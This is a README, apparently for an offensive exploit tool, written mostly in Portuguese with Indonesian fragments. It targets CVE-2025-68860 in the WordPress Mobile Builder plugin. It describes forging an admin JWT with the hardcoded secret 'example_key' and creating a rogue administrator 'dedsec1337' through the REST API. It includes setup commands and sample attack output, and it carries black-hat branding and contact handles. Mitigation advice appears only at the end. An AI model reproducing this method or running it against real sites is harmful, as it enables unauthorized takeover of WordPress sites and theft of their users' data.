
Script de exploração para CVE-2025-68860 direcionado ao plugin WordPress Mobile Builder. Gera tokens JWT forjados usando um segredo embutido para autenticar como admin e criar novas contas de administrador via API REST.
O plugin WordPress Mobile builder versão 1.4.2 ou inferior possui uma vulnerabilidade de Autenticação Quebrada (Broken Authentication) que permite ao atacante criar um token JWT válido com o segredo padrão "example_key" e autenticar como admin (user_id=1). Com esse token, o atacante pode criar uma nova conta de administrador e assumir o controle do site.
CVE: CVE-2025-68860
Causa: Uso de secret key hardcoded "example_key" para JWT, sem validação adequada.
Local da vulnerabilidade: No plugin Mobile builder, o arquivo que lida com a autenticação JWT (por exemplo, class-jwt-auth.php) usa a constante JWT_SECRET com o valor padrão 'example_key'. Esse secret não pode ser alterado pelas configurações, portanto o atacante pode criar tokens para qualquer user_id.
Impacto: O atacante pode criar um token para user_id=1 (admin), acessar endpoints da REST API e criar um novo usuário com papel de administrador.
CVSS: Alta (pontuação 8.8) - vetor de rede, não requer interação do usuário.
O script cria um token JWT com payload contendo user_id: 1 (admin) dan secret "example_key".
O token é usado para acessar /wp-json/wp/v2/users/ para verificar o acesso de admin.
Se bem-sucedido, o script envia uma requisição POST para /wp-json/wp/v2/users para criar um novo usuário com username dedsec1337, senha admin, e-mail [email protected] e papel de administrador.
A saída exibe as credenciais e a resposta da API.
Python 3.6+
Library: requests, PyJWT, colorama
Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif.
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit ║
║ CVE-2025-68860 Priority: HIGH ║
║ Dedsec Team Exploit ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram : @DedsecTeam1337
GitHub : https://github.com/DedsecTeam-BlackHat
[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!
==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email : [email protected]
===================================================
Full API response:
{
"id": 3,
"username": "dedsec1337",
"name": "dedsec1337",
"email": "[email protected]",
"roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...
O atacante pode criar uma nova conta de administrador, acessar todos os recursos do WordPress, instalar plugins maliciosos, alterar conteúdo, roubar dados de usuários ou usar o site para ataques adicionais.
Esta vulnerabilidade pode ser explorada remotamente sem autenticação prévia.
Impacto: comprometimento total do site WordPress.
Atualize imediatamente o plugin Mobile builder para a versão mais recente (>=1.4.3).
Se não houver atualização, desative o plugin temporariamente.
Verifique se há usuários suspeitos no seu site.
Use um firewall de aplicação web (WAF) para bloquear requisições suspeitas aos endpoints da REST API.
Como medida temporária, altere a secret key no código do plugin (se possível) e restrinja o acesso à REST API.